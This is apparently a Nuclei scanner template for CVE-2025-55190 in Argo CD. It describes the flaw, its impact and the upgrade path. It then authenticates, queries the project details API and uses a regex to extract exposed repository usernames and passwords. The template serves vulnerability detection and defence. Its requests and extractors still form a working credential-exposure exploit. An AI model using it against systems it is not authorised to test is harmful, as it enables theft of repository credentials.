id: CVE-2025-55190

info:
  name: ArgoCD Project API Token Repository Credentials Exposure
  author: nukunga[seunghyeonJeon]
  severity: critical
  description: |
    Argo CD API tokens with project-level permissions are able to retrieve sensitive repository credentials
    (usernames, passwords) through the project details API endpoint, even when the token only has standard
    application management permissions and no explicit access to secrets. This vulnerability affects versions
    v2.2.0-rc1 and later, including 2.13.0 through 2.13.8, 2.14.0 through 2.14.15, 3.0.0 through 3.0.12,
    and 3.1.0-rc1 through 3.1.1. Any token with project get permissions is vulnerable, including global permissions.
    Note: This template requires valid ArgoCD credentials (username/password) to test the vulnerability.
  impact: |
    Authenticated attackers with project-level API tokens can retrieve sensitive repository credentials including usernames and passwords without requiring explicit secret access permissions.
  remediation: |
    Upgrade ArgoCD to version 2.13.9, 2.14.16, 3.0.13, 3.1.2, or later depending on your version branch that properly restricts repository credential access.
  reference:
    - https://github.com/argoproj/argo-cd/security/advisories/GHSA-786q-9hcg-v9ff
    - https://nvd.nist.gov/vuln/detail/CVE-2025-55190
    - https://github.com/argoproj/argo-cd/commit/e8f86101f5378662ae6151ce5c3a76e9141900e8
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2025-55190
    epss-score: 0.05376
    epss-percentile: 0.90256
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.title:"argo cd"
  tags: cve,cve2025,argocd,credentials,exposure,gitops,kubernetes,vkev

variables:
  username: "{{username}}"
  password: "{{password}}"

http:
  - raw:
      - |
        POST /api/v1/session HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    extractors:
      - type: json
        name: token
        part: body
        internal: true
        json:
          - '.token'

  - raw:
      - |
        GET /api/v1/projects/default/detailed HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{token}}
        Content-Type: application/json

    matchers-condition: and
    matchers:

      - type: word
        part: body
        words:
          - '"repositories":'
          - '"username":'
          - '"password":'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: exposed_credentials
        part: body
        group: 1
        regex:
          - '"repositories":\[.*?"username":"([^"]+)".*?"password":"([^"]+)"'
# digest: 4b0a00483046022100e1bfea25532fb0afb12b7471574fc1cb994fa5fbca2ae7b503a6836b71a882db022100c2b15c31d6eca9b8d25629357c029a57ec519f7dadd76868aa4eff5e4f585add:922c64590222798bb761d5b6d8e72950